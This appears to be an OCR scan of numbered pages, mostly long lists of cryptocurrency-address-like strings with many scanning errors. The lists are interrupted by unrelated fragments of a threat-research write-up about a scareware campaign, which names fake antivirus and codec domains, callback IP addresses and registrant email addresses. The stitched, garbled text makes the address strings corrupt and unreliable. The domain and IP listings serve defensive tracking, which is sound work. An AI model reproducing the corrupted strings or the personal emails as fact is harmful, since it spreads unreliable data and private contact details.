155bXEG2qSr5xTnQkrCHXLwZZoLS7d6mfN 
155CuJnpe2SRTJ68rgb3dingFCNf9cXZif 
155DQni1XHmXEw3ZUW3xcrvk3ugAzYyL4z 
155EPJST6VZA2nfyMLMRjjLekZmj)TfyCf 
155npRG6FXYEG3o0dH8jawBc46hX20qS7Rx 
155P1dRMESfbUQS2ZU0Ex9ZrCn9ygC91AY 
155PAEzmx7rWMvjulyCgu3ELkA7il1RReHP 
155uRkpdz87C9LNM7dKcWJPAor21NsRRLU 
L55WPJf5ztXSK7bSMTMroizjl2QbYUrywz 
155WpKuuvp4o0H5TgejkAxLTK3gJ2BxXFtL 
155x8VryUZExGMmgPiIMnGVVbMQgCRQ2xda 
1561T1fZnMjDsv9NaheC5gaPt2wN4DbYyq 
1564CxyCCAymMQqL6aYtCPwrck4c6gfgtM 
1567ffrprdVDcRMGMwj9q3eoNRCc8GxG6Y 
156AM8Q4Z0Z9TkaHkLyaRV3RIWAJrqyz6a 
156B9SAscGh73TRiKrSsYPePiNbnKwJBND 
156dyxpaBUWLaps1VaptHeETZpTvuizMxf 
156fXcZdMeR6tAg4C41YXBtNk2KxtqqhYC 
156kdHQHPLC4dTmtQjrhRsbxg9HMsyeiiF 
156muqnJwEiHcYNEPsnDu5yvnc6WtW5tZs 
1560EEdWKU7jL80ZYDWaDsrB]pvWztTuae] 
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premium-antivirus-scanv6 .com - Email: Ktrivedi@go2uti.com 
private-antivirus-scannerv2 .com - Email: webmaster@parun.co.kr 
privatevirusscannerv8 .com - Email: info@rasystems.com 
secure-antispyware-scanv3 .com - Email: info@prrp.de 
securepersonalscanner .com - Email: info@prrp.de 
secure-spyware-scannerv3 .com - Email: info@prrp.de 
secure-virus-scannerv5 .com - Email: info@prrp.de 
securityfolderprotection .com - Email: info@Wholesaler.cn 
spyware-scannerv2 .com - Email: hanan.abdelrazek@bibalexy.org 
spywarescannerv4 .com - Email: hanan.abdelrazek@bibalexy.org 


b2b-forums.cn 
beforeyourdestiny.cn 
bestvanillaresorts.cn 
consensualartcn 
gazsnippets.cn 


goldensunshine.cn 


guidetogalayy.cn 78,46.0.0/15  —— AS gy AS24940 


. N 
mywatermakrs.cn A 78.46.201.89 


personalrespectcn 


A static. 89.201.46.78.clients. your-server.de 


rondo-trips.cn 5 
securedvirusproscan.com 
snowboard2009.cn 
steplessculture.cn 
vipsoccermanagercn 


yourholidaytoday.cn 


Sampled scareware from the last 24 hours phones back to mineralwaterfilter .com - 
2535 


156sRCNenkXo7WntMEXkYP8MsiqMuC9HVg 
156suXaNd4dXEBEv47paqzakY4bPDJ9XxX 
1571cSDf6NEZ6eumLNSfKXLF2AxxfEy9gt 
1572ATVWE51xcXhq3zXymgxoK1SaPf9ToP 
1572e9hbHAUNeUCbb1sLGqg54hJuqg9xxXUs 
1572mfmms36cjZAEAWYKj6cNXYJ5KcB98m 
1573RYfofHSH1W4tkxXuVjJJRAvcTWqupLU 
157726XPaFBouYrKgJeWohYbVxpAnZNxrs 
1577SpruLwzD6suCFJQ9nATENdKJpE3uxL 
157BeHAFv7CfEw5UTRHn5Q3ZQuUVNBsSwAY 
157BzxG6PnjAKNZThZGIJomtUbM33CRgyN 
157D7irDWs4JUFEtgKpKdXvqGsyfv8jdJ7 
157eDchYgdxsCpFWrMhoMRhkgFzqwwxQqn 
157FipGAq4NGDewuLqjQ19WsAeCAZPB4Ak 
157KpYECmJqPvEFUn76euQxX9XU3s1qjHBz 
157qvUXzeyXjtPRW6AAnDFJB8K1cBT1fCU 
157SyQTb7MBnWYNGGuZJt5LHsRzwtaHg58 
157xcKLdk7aooYikKHy7qjmSmAFfPGG1DKK 
1586yccLpHrq2XVt7ExnX9rkG6PLC2kaxt 
158bp5GGVJsEPXwrbsDYSMWmhhP7tVYDPM 
158cQqJ9sdUKipYZwaYzqBRZwYnv9WCK8o0 
158FVmDfbScr4DQ8Nvgmdu3NZb4HEu68tG 
158G2DBxi8Ufk56rfkKsbYeMnEz6u3KptGy 
158KLXLKC5NbpowUaj973MDPDe5aGZZizT 
158Q3Xr4Byqo56h15J5KmqTSUZ1wGksnDg 
1L58QAHR46pW4bCgbCmwiZgFtrYzGma5Fo} 
158qtcLjjuVFrsnXqAagQf3s3TPKHNcxhx 
158RJTYFktRAdAkRem4WxVtFqEZ4nfeRyP 
158UR2hkaqJdKJjJCsguzTVwnzQFsSYJUkKC 
158XLqpPfKQXmJECPgTcfkS7C37rKBuaxXh 
1592QxvdaHbFuAoiXaR7BBnmKrGtwLNVBU 
1594tWmLwfzwiiMgpbV6xQ2dPLcLdev6e9 
1596VGg3JKNJTXxk9F3vf7WsvJxYJF5RPK 
1597ak7xaWiMJgPQguManARQJDW8vdjWmkK 
1598UGXKfLGB73yHXRfcGFkBYomhNUhWf3 


25323 


159AULGG5K91Gp8DhFSjEFBrLfB71tdpjP 
159BetAdpDpPDngXYUZS5zeJkgENin1h5G 
159cMV28tozMogNN6s6ETg7JPIGLXMLjPW 
159EdHsVifVmLuLbVelkp7kEw8Rua5uatG 
159gLvoFBD67UrVMsopZ1n1ULpeKNkHGqc 
159hr93u08qsftzLqMXRr7mCzYxEMCX8DL 
1L59Q9NKWof8juv33jMbsQUV7ioDU8hZyCd 
159XJvqohdPheqwRrH1lyZw/7ZfbGjxtXiui 
15AlhvAynncgy9LDGoiexS]7W7LHtUoUUm 
15A33NO6NYFZXxB7xhhDZ83i2ATXoczBMKL 
15a8tU8EQ2XEGH1WKwAWScaZxRUWyP66XL 
L5AANFRtfF2TSNVFZtcL8bFxwstjfk3Yelf 
15AAUonwQ8unqg/7DmtqEzd2txsNdgmVbPSy 
15abNys7v7FhZcAZGLoV5QAdAsSZniqJVtk 
15abXrdHSKH1XraeoQbeFrrScVUC9RMYTu 
15adza3QjPThnbbuxzfwFGoP95mPXcprR5 
L5AfbitTKP3EAcp7AFJSyWhDfSKKiVtCdD 
15afQUpSwnKSDXGQ8WUEcgv1R7dPQHhvUm 
L5AgkvQMhAuw69wX8TgKyHBbbyKqw7qLD7 
L5AGTtYOAIzZ5PhS4cLzZAWkm]JhuvY5xzBL 
15aH7nNMWHwtXT1BNS9vBimbYWyaASfPbju 
15AhED7p9PPGyTyduTHs7Qd6Au3ZvRa2r8s 
15ahEQ17aknEoypLpkbidfYB4c1MoEbZZU 
L5AHHWVK47qginhdoAeNg3Hzz9DmsyVuAKF 
L5ahnmQEsWFakMkjJef68aP2xhfwnfsYaWd 
1L5AiEMAh87BnU78BcJjdqT KuZmf4uAu9Su 
15aMPMYpPBmeobaH1Cfsq85yNBidCEL1F2 
15AMyWxFC6nz5o0LfNULFRCfXLWbe6NxPvf 
15aPt}yluRqVFSvTHfMomLRy1tCeY4Ug8o0 
15ApuhExC6G7s73FsonUG3mAihLAbcwdha 
1L5APyXNjhHslEesrxifTJ8T lgyUDJhzs9d 
15AqfaiPZ5dsDB66ezTETtKm1L87t9tf50 
15aQHc2VtR92FHLENVwt5 1lwR2jfztbNpd9 
1L5aqwDrkEwJLNWio3RSgeBZ2w9Q4KJ3CpW 
15ArNurR8UGEztNccfEUHyxP2WMujbPxRf 
25324 


15AroB89TWPzrVxibU5fYVuWrQzLzPqkPx 
1L5avSbe84iVjwyxBhwWLZYQhAw6ibELCDp 
15axXu2EhAvpWDEcOoWEcWeG73XCNe7vRjz7 
15AZeTX5TcsU2qcldw4KZCbB9Rpd12nMAy 
15azFCfGdPHOZWF5NMGz75kkqxVPZEKGuD 
15azrVDgGNVpSRkP8U7o0NfVcfnHpLK707z 
15B2abEFWck6NjmiVwysb3TXX40DRnd4Nc 
15b6W5AYpGbNtvGb9DJHZahDNVaiUVeEGd 
15B8MYCF7cueYjo6CCFmDgHu4KIcYWR4mQ 
15b9YpXJPyNjteQauqZJbCUEgju5ujkdjk 
15beUYEP1linKadF8Px21WGtoUSee3tGGVn 
15BfuzLDSRTJjUCW5GGjTA7GrVyWzYjRAP} 
15BgR8D3GbZx6RTfQ48kKNCZVVkbFZeRYnL 
15BgujhDj7w3YTz4yZVT6S67xU5rH4WXkb 
15BH5t1q7tLPst6qxtmmwsZ6eZ8LE28xD7 
15BHDDs3isVDGNFLNVgDXir7pHELKk5o0Ug 
15BLtol63jNhFqqzV4xqgiqwyD84JdJYHJg 
15BQZb3WYjKcurrVT1o8F81SSD67VBV81uY 
15BRaWQUsdLvj3mTS8GmzoiDt66G1pnZuK 
15bsCy7VG3dnHD9qMjg72R2ABgnW4fVaUQ 
15BSySCAcsNbzPKh7ZCVtM1C8xC2PsY6qb 
15BtBDAjXw6bBEiZP]YeYajqbYHxa41ZuN 


15bU9DHPQyPxkGgRvNH5MHgmWS9X61M9fm 


15bV8672r3KdrRpmLUZ4216pumQ1L2St2q 
1L5bvHrf9t3dpaWsewdA5dce4pCkRrqoQtZG 
15BYFdJEeUZfDclolrjipcABJEACwv7KvW 
15byUUkgToYKtyQR4rfjcsHzBAmjdZfYdT 
15bzPZQENFJ1Q2yhs8vA3bcwcxb/7FsJuxXg 
15C2WXXzT9buiC6vcUPDxjobDA5MU8rhEX 
15CBSvUwvqSh6HQQfuLURRsb21x8dC31EB 
15ck9eXaktSiGxtFG4o0UAZtyoe91TMJ3ZH 
15cnMh2ySCjncSNHujaez8jmgQeiCd6bWT 
15CoZ4HvHa7ultZ3v4svrg45RBwjJSpmjJHG 
15cpRBcfLMBkAalTnaEPy9cgaNixcGA]pi 
15cpWcbAwWNsBhNgsuhSBCqvCRnjFfUGhqgY 


25325 


15CrzzbqWMMtzRg9Gbkh56vanjMer2fRCd 
15cSt8Lf4pKjMqixVNNXVedKS33hxrF4wh 
15CtQcdHovcRbcvn5KKH96yu8YS4UZzyZD 
15cUTUGaM1p5cYGTHxESmuetHi65K)jBHP 
15CxoTUCrRCNXqwTdvHz6Kvhc1BXLGmhn6 
15cYb6BiICWdzwgk5JoK3gUU60QynCpTZJc 
15Cz202VSAoMaJnVjeZX4nubv7zzs3o0hFV 
15czt7y8vZcfMtGP61MijTcGQoTmwbnWcL 
15D38eU8cmxjwnZeP7vXb6Mp4gBAm85gM5 
15d3LaYtmTNsQ2Hrea78TstNRCcetS 7Jf3 
15d3zQgy5Fm4uQpKmZtK47UbDRqLz8Atsb 
15d4aBPQUbVD162AjWaW5mQwBFLMQyw9CD 
15D5b6UwoSv5Uf6s4sFHhBJsxUzi1l6tmvj 
15dCjjUTILBmMoXCUWF 5pwroYY8PkG4AtVR 
15dD5zK5hZyYie8LZBY5bGk9EBWhvede2X 
15DfUDxkPQqgssxX4BxH9yFdeUxY21jHVkc 
15dgzJZWZPGmhaJ2iUS1r2runSjFZQmAqm 
15DimDTbrNyExE)XfVYEF4Hgiwf7BNaAXc 
15djMvgo8VN5GcPiAZJ9ZhY31eR4TCFH1o 
15dMK1pm1g32YveY6QmPRxZ8JhkqkA9uHi 
15DqAnRJjZ9aofkyUSA7LkkzcqrTZSmvTn 
15drSwS3JwCStg9WejT1kMxy6goaEeSiuo 
15drXbojikXbYSFpwVo2LhTovKvcbXL4z5 
15dWxSrJrfsiTvlFsb2Z91U9XvvoeEUXVd 
15Dx5f2bkFNpbM8Lo3HqrGmp49UYU4Vm5d 
15dXmuXsijKSZBz7JqeATfFb8mRVvEFfT6ci 
15DxnK561tApnPPU97Q9zQjayFtfficKH3 
15dY8PjZojWaRW7N2pTNk38C9JBMgjnEzx 
15dYWwAvel1z4E1VgFWyoH4EVZctAMJLtkV 
15dZSP1kkN6nQJpuW6zjPGfeKAHneRNjZz 
15E1Jb1LUnNGq6aJRctUvd38Wnc2fVvZulp 
1L5E4ZfnkcMg2c5CiuDCaihrjom1D2YHfWM 
15e6r39wnUmMWU8nYs91dv54S8CsUr7Bcic 
15E7iaR9MwjJSHLnzwANs4iVUCRNEyFjDwb 
15e8QpNDPNcRnhh/7f6yTav3PRsdhtKETvu 
25326 


15E9yFSktAwEPai8iWpu4LCyUGXL59cRFK 
L5EbDqMvfZ2rfhRVKKmFgheVzzhyQKswkr 
15ebpna9xdvioPKatkxhhjFvMTKPvBmpQy 
15eCooKYwRskoBFqpRGQEipuBjBXQ9GZXt 
15ECW2Q25Dnk1lQpsheMNBQ5eqA2fHSWLTW 
15ed3qkKs8fZJRmMCFaCcruRpEPtwC9xQVV 
15EdNm7sANXpzykWmsboq2j6YBSaVsm1Yo 
15EDPsV1x2JhXm2N8iDo8QUEyFdDZj8ane 
15EegsZu9cad4JKtLlaQmqupUvTvpW5LGXm 
15eeRQY4Ewlu2bNWjTYgUZYnPuapKXdB19 
15EExgv4PRuehH9D7KA8ytoT51r9z2Wotv 
15Ef8atetNQiVPR2kKoGWJDz4HpA4jCWXHt 
15eidrPbqqsRsm7My7Tb9yyqwjUlnaTBUe 
15ekwQVrfsxAKxHN5HZAv6o0sJs2r7zwq26 
15eMLKRpU9extCQsb6doBLQtEBFeYXiwuu 
15eN85FXk2kVa85FjTp2tzXBq55tvdsxXLh 
15Eo2mqSRUA1HKsqnixHinlaQ6y7uLF8pE 
15eQyTL43nxzPPbLMf28UsbbXPeKKkZ8gV 
15ERckzQRX9Ex96DXLUBb8DzxXfuC7HP4Aja 
15esn9vnmvQc5XiYZiDnnaEe2MnzEwBK9B 
15eSp3JwWK4YRKRHjVqT5ehVcQ7mNn4z6R 
L5ETyKFuMJDKHbM2gbXnT1V1j9bdpmG3dm 
15eVetKpULuyb1wyYonTojSHqWgseDs3mF4 
15eYahwFr8ttHSzeJeP4UiNsesV27EYTpX 
1L5EZASHB8viv9fX24kbyWpcCqoXvv6vV1QF 
15EzSoDhYuRfajiHREbtgwUAWRbxAaWcac 
15f1EyYeDxYxMsoAz1LpwHW5iJfVj7VkK8E 
15f1k8DF2DBEwBe76sFDoXQznszv4MeT7R 
15f2DiSPLEDWMnZgLgBq6w/7rwL9OUFsVU61 
15F5ikg48s1buhYGyXJxLLOfwHvX3wb9NE 
15f5Rj3NKeQdVU1X4nHhWRrp4M2Bh3wRvF 
15f7svVMX54xgE1RKN8qhQiwP2dn62)KoU3 
15F8sE7NQ6bpm98wpd5pTEDDsSMY2KVXyND 
15f8w3tNeyYEYuBgPkJFysKB25Y6hFRXPP 
15F9QLbk6reRJbbqfDivl1Sms4HqUM67nbm 


25327 


1L5foNGCr6éiwi5fnloyqvAwZvfae8Ahut8k 
15Fcgx2y6spZ1U6E8sr5H6DHAH6jzenuWS 
15FdF3Jm3NXCav5ah87v8vtMbNywjmG7o07 
15FDLQ5PkygANdprNfJRGXX9XnpBa4sHRD 
15Fe7xeAW4AhTWeY]4vsWh5ANHwzk8t4r4 
1L5fEHghCtyWUgeyYStrfobhPC6nind53RGte 
15FEvzCQFpYbbb9NjKqMSqEhCeYsvPCHYG 
15Fg4bNoYZcvaV9RjyeyUMG6RSyralXN1J 
15FGdtJrjo6owNW7Rj5TUaFHimUQVaUYt3S 
15Fhumh4xsmJB4afh9AkNJwoYq7HxsxZXS 
15fkbiYXUQPemrGBnQ21a3YFeHraNKLwzv 
1L5fKj2cjoeZ2W7TyNCKHg7FyYuYgxdXmDR 
1L5Fq4xFYj1WJJnUdPxJvGzcprp74f5rDPv 
15FSdad6zJeutfyLW6TKVjY93wnzKsxeSi 
15FsDKz67gz7PJcHriGAEcyFnovbEAT8rz 
1L5fsMX7xC8QBnkfS1QK3cnAptiM7qfxupn 
15FsPoDLqleaUkgRZQuFegoPixiMMEQQHM 
15FtCstmcAyT1W8nineQkhkBP]gYmbYSVS 
15FvQwYCkDoDDkhogRbDuCMVc4ZeAMdEv7 
15fwyDXw9FZZDp6pGmbf6DrnVyPkFeeg1F 
15FzYwyyAtLmUBmGDdkyCgHYEyhL8KAjd7 
15G33qaRa4S2ixBmMQVvzBssSDLyop1rHwE 
15G5h8GmhAWaFdsMXV3zQFyQu7adScBbjm 
15g6vostXY6Y6003933eK60DpxYyStCFVb 
15G6zZUc6ROYYtfsgib8q6PAo0QJSUUN1sf6 
15g9jSpNgQxjrSWwiaB52y39W8f5Hedtso 
15gDaB2U2AYedqJGRFegpYvvoLeQrG263x 
15geuLYG2D6U2q4qqtWGyb5s7GmXbdSv9B 
15gew5WAMyDgC31SNZdqKjy7RVNAC17ZLw 
15ggBloxQrtaP8NqwN6éiN7dQkWZA60YtGm 
15GgNMexd95VbT8VQnDaavpMvZDraeqNgY 
L5ggpJZS8ggN6SatftTKJXyqxi9wjzaGVd 
15GHU9pUJxktJmkAEJGZMEDGV9nBcBKxgm 
15ghzLjPyix79GegnZ9eeTGekfBSY7MA7s 
15giU7bt6US8TK9TwgbXoaQerHFzGEdpV5 
25328 


15gm4YUGRdjo33Pw5jjzRgQVFMzwzAf1Tz 
15gMi3deancT2sxkK9tDujfDTAFvzT VUdqg 
15GnVYvni8LmMDuS6LMNM6UouuGgSRkMyEt 
15GoPGWecPZMEFHrgCLJhFMUFaTU9HgxiR 
15GPKoAVNjsK6Fzb1VmF6bxL8MmyYcwUjJas 
15GqrqiLQf1FfobW55yjUMkuyq7ktNDVuRT 
15GTDSWZHvFXNfnHxFQbRHFfFqEe2Nqos8 
15Gu9agNq4BylaQadvhzZtEAgV7ucWQUft 
15gukFGuVvqG5qbLtvomyr8aqJtPyy2reN3 
15GUu4vzt23HECUCTuGLjj80KcJ3csY41j 
15GvXBRRezCmb4HcgNpEjDPjA55bKqMmi6 
15gx6dPmc9rPdm8xYWsAYd7bPTZMcJHzT9 
15GXff9bNrtNp3AyzZFQMdsfHRC15KSZyBL 
15gy4XWCnZmpAR5kwFkKCCgVjRF9ZSF8rL 
15gZrvsoD8vwgjkpF4hVveB7LGxqon4QAv 
15H1CTPmgh1DzSjkD7ucNKa3WtDexXbjdbR 
15h1wE1SqqpwLpEw7YCXLOBWPROB4Sk58L 
15H7Ew4ZF5nBYVMu5i4e6LyMkyqwjGBzm3 
15h8k7MCmdF5RBCmDpv7A2zGk9ytoHtPxW 
L5HOWE7ADd1mZjYPGjAj 1jdFjJwt7 qFt6F 
15hA8mqx6zBhmbB9qJG39cwIwEW2ctGDpr 
15HAmE5ykBGDWUNxdz9viaJx2H3MekbqG8 
15HaPaatBkEq5CuPxbHBvY5TaZo5m5k66p 
15HcJL3qfelyGCT 9MfybAiF2d2YTvk8xTa 
15hduiJ8gzsi6N8o0er7YjibdKnZRaBMae7 
15hEBdcGpE11tjBG3CshvgCili5tPjJUkbM 
15hfqBBvuFFmLxtA3uU22KRqorVTELCVNz 
15hGnMpQHfkHvxn4s4bFx6TeghMy6nvpVB 
15Hj9MGHvFCKBMmS1NxZV5PseJU4UouhoW 
15hjirPS2ffScPF8Y2TrENCGX1CPy9bTNY 
15Hm9mMK1Q1hgKUnsBEVdFt5j9jxXWNgerr8 
15hnEd16zX3zocm85WRHQzzXPGuomMRvF2 
15hNhWe5aNCxXhGiN5TGZDviEcn4xnr6Wvv 
15hQf5zQ3Mwief4zDgd1t5X2VbTtvbZ8f1 
L5HQWDDDSAFXYIFSNGiiTyykK1QxeQ4e4wx 


25329 


15HS53BaLi7qK1QuSm3hcwWvVvFpErDk69 
15HS9hQkKiUUNKXUD6LD5vL27f7kK4TdSFU 
15HSeNRPWWTyVaZ1H6)J3bKf2J8s82Xonqm 
15htbLBDVryRCDzLqR1ibyulmzdHvGMgQHz 
15HTC5D9Qx3HXQjyRSPaACKFe98HpzErax 
15HTUPSa7pybNwnpAbxMFervcQBYS]pM2V 
1L5Hv3GUg3WjflFWq/7fAToNit3LXsbxS9Lt 
15hVLcaRwFecYQwBNJGoSQTNSJqzMxndYy 
15hx4kB3B3q2kMt54o0g9sJEpf5GxNrtpR8 
1L5HYGQ)JbbjpZCJqg6G3zSZnDEAlyhaoyxH 
15i1zZ6GcjQoy8FEQkKhRSHEXGAUENM1v3dG 
15i244yv5W72NeD1t5GFpQL74bc4pvBpj6 
15i7bkLQqFHZaxXkSaAV7mD8TQLUNu2qvhSY 
1L5iawEAfDgUWNjziMyd7HjcMtSuFga2plv 
15ieV8z8uXgAgKLGLG4KhWqNMFdbY2D3kN 
L5igy39VH1ECx85yunQaEibsDjU959gKcf 
L5igynJUSitvRqinUkKOLHFh44c6hdsvkv1 
15iGZ3WYKj6khARqdJ 7WMS1QBsWY8EKpnc 
15ii7dZPZ9nfDEOQNIQNWiimMTA4w2t7XSN 
L5iLTr4vUsT5haUKC)ncsSgdfyDSEe6FK2 
15irt64fgVRCgtVFb4zxPwLHnpzbHvApv9 
15iu2aqq8h5bceUcpmjJD8S8xXtetcKbXbLR 
15jlkzpYLzeGKWp3uuKZvwMPLP6jrxgzZt 
L5j4KMBTfyoiaji622SAJiWeqe4J4f5EX4 
15J9GhH2AYMY9FEJfXnqdZyph7hY8jb7gJm 
15J9nZpicsKLy7G7LSgpgdxVChpx94y8ko 
1L5j9wEd7WtKqtxQg2Ex5NFEf5ufNiMd7ch 
1L5JamuNDKLWUHKn7G4EqqkTQUwUvau8RES 
15JBaN2nQ6G4CxfQBM6uxavYafZzDARKFda 
15joRMabeQCciHAuli7AveYECoFSMf8TeB 
1L5jCKbajfTjbhvBgBiLedmMrv5yX34Dx65 
15jcveEJxkt3aroajFvWinpH6EefRH2BMY 
1L5jDEB6cTgA44Gq2WotAp44TvrRT 7ujrMU 
15Jgk3n9KEF4gmPJM8pwLUJ4hUYx8WxukU 
15JKAKvrzHMddxojcYCG3xzERDoXyepYAQ 
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15jkXb5wWcjki871RNoPWZhocK8zqx9LwZ 
15jKxdhb1meSWLN2x4S5jGbLq8esvc5BSv 
15JLQN905ckDgutMX9kMEjYzehX4oeuFuy 
15jnRnV8AP456biFeBddWe8MRHvcd50nQU 
15josrUq7Zchs6dMjosGh8a5zY2AuMuxdX 
15JouskM1UHmZ2M2kUtNWNUGDwiQVtmoGA 
15J]qPH50ACs8HFjvWPofAKUNNSIRfx8yFx 
15JRAGY48XqiaEAzQ46yRc8Ane4pDtoDjE 
15JRAHITZo7NdRJHEeUYXN1sWVY1Tw4yk5 
L5jtAWLQ8YahFfPQpb6y8wjcb98C8ypaGzv 
15jYc5P5WhFPEpE1TzZhD2DNJ5CFmdso5T 
1L5jyuQPDNpLUKQj63JrVT98gVKJm6q6bKNs 
15jYZD7fd9xkVmMJp8Sqoucy7RLNWXX7ik 
15JZBERwnUeHCHftxyVNYt3MsxYJodNFPW 
15jzUr36UJQGIMHCGwzbYroDVEqV56vmiY 
15k7RWaKE6D2WABTyznKbwZBBrhMjZWeWd 
15K8cmxo8EUPRo2AyhdEphFT4PL9KiFxoU 
15kBPtT3FEF25x3T /fW2bwg8D5GfpRM8Yv 
15kBzDdrDS1VDobMcraULWWZGlev1irMmr9 
15KcwwRsu9hZ9mVo3b6bmMm814rVpZFwMXxXx8 
15KDONDMY913NZrSNq8Mh7861qvbAvakKe 
15kenyVEHy3fy8ZsVZNgXf79xkcRvrr5tx 
15kEXBJBcyYhhBEx] 7nNQC1YMJDE3SZFspA 
15KFbAmzCPD60bw3aAhHM3JEn2BkKj631vM 
15Kgbsv1GpF 2fHcV3t1xBKoYk9RywwDWe3 
15kJmpps9WUDvogAK65n022NAqwhp1ZvHR 
15KJxFrnNHzjBZKULMq9JXxAtrCQ4tB5WP 
15KK3cxwsk9igvHDCGnGtAc6ksNGKXcdsD 
15KmaYJoapRwS9GaUanr6QkxdJ1loAwcmB3 
15KmepXrajM6m7Rncy5RtCwSXAcNTnPeYg 
15KNgnK9ymPLKdRJMcSRJt5EcjnAhRvs2e 
15knuaP6iu8wsWTUaWU8fAno2Bmrs8CZgT 
15KnZHKSIMW1GkpVeubadwhYXHxGMnbkDm 
15KpSt4qoCAvo3hzmeo4cUk4qveegGAo8w 
15Kq2HtciJeHRBXcXroALxwpVe24M59VsV 
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15KqGYxzn7HhjAv2nS84rdw6ETWvxDTGXv 
15kr8miG2MHrJHo8itP2iwR4g68RFyGsPN 
15kswbejkaSDiFAcwQV2HFd1Gk6Lcyq7Av 
15KTmjqPU5NbEz1bHhbMgkPHognLXUDtFq 
L5kUMfTFA3VnzKiwnRvZ7QbTeVHT3VvZxMU 
15kUYzoAdgwJ4AtPCxMF4e6bbWBmQXp1k9 
15kWzg1tf3v78kRsyVKjpxFf2WMiFN8HhG 
15kxeiyG6HSqzQryqei4yvyWeL4kzpzcBW 
15kXk9a3LbtECeMHpWE2AqTvPcu9VTaTFp 
15KXXkxLHH4hj5tG3gydks4pa8e6o0jo9]j 
15LCGckxXjhzc4aHbTH5PUPBEtKXgUsmKNQ 
15LcYpRuWZ6wSwiUPSuSaMnwKX2bW1Hrdi 
15LDMBWBLP9nyKFal15hBY8pgb6VEvb15dR 
15LKv57kPfEDWWCJGXUfV27e6jujpeTbZE 
L5LMQCtVmoypfxXo IcwvkKAW2o0JH1TUH1Q4N 
15LU1BCRM3G78HbuX2tYXgmri6krtxuC6P 
L5LV8V4gmXPvDvNC4sovedY2WUQQsSQv6f 
15LVzgJ27r8utkvVh3eu11YQ61s9TVWQib 
1L5LWKgAFHjw49J2Rpi2CnHA9ChHavZm9Ng 
15LWrbHfBaJEF5iWjXvWA1Ee1UrY6yeoPE 
15LX201hzwMkSgvgAuC7aXxGFjiKJPqckM 
15LXSoSYkuUQBWNdPt9jk6GFq8S9SdhVYqZ 
15M5a25uwEjjgmrUUHn1Vo9gTxnKwEyVUr 
15mBAXCrR9d5vEyKjS1DEBEc7tUb7NwTbw 
15Mc3FKzLiVUyy8sGcKAGFK9X3v1bzRQKN 
15meL9MNzeDmMofhjLybHEddAam2r5izap 
15mFPwiJBowFj3uiquool5kU6BwWUrzTf9 
15mMGM5Hkjic47WnRQ52F9vBfwnr5K1XSbk 
15MhjhXe8ch8ArGwDFyGS1NFLDnRshbhgt 
15MhS7EhsxXDikaew7uSa5coenfxL8SshhD 
15MHXRdpHgRUFQpYQDezysPWDsk15gv9H3 
L5MiMvpZM7Uy3STeYBZewNGgqngGk9rtn3i 
15mNs2WXMdjEak2SFiIFCg80pg9EN6b1Xko 
15MpH1p2hyo7REJxTnDdtEAmSWSGdDpNMj 
15MqN3KXtxgZZ908NrS7opneZ1lvciNZNCb 
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78.46.201.90. Parked there are also: june-crossover .com; goldmine-sachs .com; mo- 
mentstohaveyou .cn. More sampled scareware phones back to a new domain Phones back 
to pencil-netwok .com (94.102.48.31), parked there are the rest of the phone back locations 
for the rest of the scareware such as mineralwaterfilter .com; june-crossover .com; goldmine- 
sachs .com; bestparishotelsnow .com 


A second sampled scareware phones back to a different location - 92.241.176.188. Parked 
there are the rest of the domains in their scareware portfolio: 
bestscanpc .org 

bestscanpc .biz 

downloadavr2 .com 

downloadavr3 .com 

trucount3005 .com 
antivirus-scan-2009 .com 
antivirusxppro-2009 .com 
advanced-virus-remover-2009 .com 
advanced-virus-remover2009 .com 
advanced-virusremover2009 .com 
bestscanpc .com 

xxx-white-tube .com 

blue-xxx-tube .com 

trucountme .com 

10-open-davinci .com 

vs-codec-pro .com 

vscodec-pro .com 
download-vscodec-pro .com 
v-s-codecpro .com 
antivirus-2009-ppro .com 
onlinescanxppro .com 
downloadavr .com 

bestscanpc .info 

bestscanpc .net 

bestscanpc .biz 


New/historical redirection domains used in the campaign, this time parked at 
78.46.201.89/94.102.48.29/different locations as noted: 

beststarwars .cn - Email: allisonnh@soeconline.org 

mashroomtheory .cn - Email: webmaster@TangoDance.cn 

space2009city .cn - Email: webmaster@TangoDance.cn 
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1L5Mr36S9TY2n9f5cQAapT4JZMLFx25BM5z 
15mrHH495WhVDjnhg5YjB7WDaXx4A8s4ZKG 
15MRtxrDnXn2vFxzmDEPiWtkWbz4axUY8i 
15msDsmWnLgNptls4yGQvrapu58EVITMVQ 
15Mtau2YEnzn5Qs9MtpKNxRGueogdfK2KB2 
15Mukb6qWb]tKHeapYEE1fdnD3vd28te9H 
15mvmcbHuo7RV4LURakaWZuD1d20yomPZb 
15MWy64RxjT9PCWiI4ZNAHpyCUXVQbrT8nA 
15mX9DSjvC5ZQenSJWGRH3QR4NLz7xPGq2 
15Mz5gAFDRvn16HJGAUCBcJdwHE4KKxh2r 
15N5zzos6nwo3EFNNTf4vxXkeKjSQFbPc1i 
15n6CvrVAzDfnhcAEE5eBxp68g9nbsrhuY 
15n7geHXq9ZtbDXhdBtmaYNFFQjfLWMZ59 
15n7mqTGrPcsMDugYqAPU4pzYkt9Z32nMT 
15NaqKCcPd1Ycy7S5SMDGqu9xDFSSQpSmé6f 
15NdzCAmanBb6zgZ4n7RrVfvRaHWAHhH5p 
15nfRXc1ZwV4zPonM4o0UgAQt4qPVNhYY6p 
L5NHPTVpg5TPz2Uj125pcS58nugDQ8X7wngq 
15np9hyT5jzRgRurCkSUaUuJbgGgLGEoao 
15NUdB6SbCH8nBLAjUrBe8SA4V559PpwsQ 
15numt6YRPT3fBxWXW8YwvLPnKfmHo82Cx 
15NVxocySPcTjJZ8MBaVeu1lZBhtLgKTzgrH 
L5NYdfvSatUTn44f42GtisTyN1fGpxdw53 
15NYKEwG7BDRA3RS5xJFSU8McogYDfBuXxV 
15NYQboNXUFAjpfSZE5fNEroNoWwVeKpYx 
15NZFzqw3DWzfMRVVnkGSMfAGFkk7EQq4H 
1505SuoAvwA9uNapCc893Py4qveYGJ954N 
1507zdeuMUiXmb9NiS3QmUdSVpmUGe}JfeC 
150bnroTPe2CExtnnY5Mfbedg3vBZ6a513 
150BoU611vkqNaC1lmDcWcCh3QzskHrYH2Z 
150eBLiwolPC6buzYbEG]vt31GqETcs38d 
1L50feoHMqFF4e7JX95Zfh8s5ZHrZVs8L6T 
150jqSxZ3a7sr7abkARLV22FMffUhiMdpN 
1500yDdGyn7BjA7qPEuxg35ZGgsFfzsAYm 
150pQ5JdqpBckr7ajHSVKUQB11MJnukgxXS 
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1L50veP6AyNicqHioJCUW1LRSELQP4EzrRUw 
L50WQNSb7ggnnfEQzGE94Rx7Fdgs9RhFkh 
